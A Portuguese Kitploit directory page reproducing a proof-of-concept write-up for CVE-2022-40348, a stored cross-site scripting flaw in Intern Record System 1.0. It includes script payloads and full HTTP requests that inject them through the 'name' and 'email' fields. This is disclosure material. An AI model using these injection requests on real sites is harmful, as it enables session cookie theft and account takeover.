Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2022-40348_Intern-Record-System-Cross-site-Scripting-V1.0-Vulnerability-Unauthenticated — CVE-2022-40348: Intern Record System - 'name' e 'email' Cross-site Scripting (Não Autenticado) | Kitploit
Ferramentas/GitHubGitHub/h4md153v63n/cve-2022-40348_intern-record-system-cross-site-scripting-v1.0-vulnerability-unauthenticated
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebSegurança WebTestes de Penetração
GitHubh4md153v63n/cve-2022-40348_intern-record-system-cross-site-scripting-v1.0-vulnerability-unauthenticated

CVE-2022-40348_Intern-Record-System-Cross-site-Scripting-V1.0-Vulnerability-Unauthenticated

CVE-2022-40348: Intern Record System - 'name' e 'email' Cross-site Scripting (Não Autenticado)

Ver Repositório
321há 2 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2022-40348: Intern Record System - Cross-site Scripting (XSS não autenticado) nos parâmetros 'name' e 'email'

  • Título do Exploit: Intern Record System - Cross-site Scripting (XSS não autenticado) nos parâmetros 'name' e 'email'
  • Data: 2022-06-09
  • Autor do Exploit: Hamdi Sevben
  • Homepage do Fornecedor: https://code-projects.org/intern-record-system-in-php-with-source-code/
  • Link do Software: https://download-media.code-projects.org/2020/03/Intern_Record_System_In_PHP_With_Source_Code.zip
  • Versão: 1.0
  • Testado em: Windows 10 Pro + PHP 8.1.6, Apache 2.4.53
  • CVE: CVE-2022-40348

Referências:

  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-40348
  • https://nvd.nist.gov/vuln/detail/CVE-2022-40348

1. Descrição:

O Intern Record System 1.0 permite Cross-site Scripting Armazenado através dos parâmetros 'name' e 'email' em "/intern/controller.php". O Intern Record System é vulnerável a uma vulnerabilidade de cross-site scripting porque não sanitiza adequadamente os dados fornecidos pelo usuário. Um atacante pode explorar este problema para executar código de script arbitrário no navegador de um usuário desavisado no contexto do site afetado. Isso pode permitir que o atacante roube credenciais de autenticação baseadas em cookies e lance outros ataques.

2. Prova de Conceito:

  • Requisição no Burpsuite nos parâmetros 'name' ou 'email' com payloads em http://localhost/intern/controller.php
  • Vá para a página http://localhost/intern/view.php
  • Atualize a página.
  • O XSS será acionado.
  • Um alerta aparecerá.

3. Exemplo de payload:

  • Payload-1: <script>alert(document.domain)</script>
  • Payload-2: <script>alert(document.cookie)</script>

4. Requisição no Burpsuite no parâmetro 'name':

  • Injeção:
root@kitploit:~
POST /intern/controller.php HTTP/1.1  
Host: localhost  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8  
Accept-Encoding: gzip, deflate  
Accept-Language: en-us,en;q=0.5  
Cache-Control: no-cache  
Content-Length: 78  
Content-Type: application/x-www-form-urlencoded  
Referer: http://localhost/intern/  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36  

name=<script>alert(document.domain)</script>&email=&phone=&deptType=3
  • Página de Identificação:
root@kitploit:~
GET /intern/view.php HTTP/1.1  
Host: localhost  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8  
Accept-Encoding: gzip, deflate  
Accept-Language: en-us,en;q=0.5  
Cache-Control: no-cache  
Referer: http://localhost/intern/controller.php  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36  

5. Requisição no Burpsuite no parâmetro 'email':

  • Injeção:
root@kitploit:~
POST /intern/controller.php HTTP/1.1  
Host: localhost  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8  
Accept-Encoding: gzip, deflate  
Accept-Language: en-us,en;q=0.5  
Cache-Control: no-cache  
Content-Length: 153  
Content-Type: application/x-www-form-urlencoded  
Referer: http://localhost/intern/  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36  

name=&email=<script>alert(document.cookie)</script>&phone=&deptType=3  
  • Página de Identificação:
root@kitploit:~
GET /intern/view.php HTTP/1.1  
Host: localhost  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8  
Accept-Encoding: gzip, deflate  
Accept-Language: en-us,en;q=0.5  
Cache-Control: no-cache  
Referer: http://localhost/intern/controller.php  

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36  
Baixar ferramenta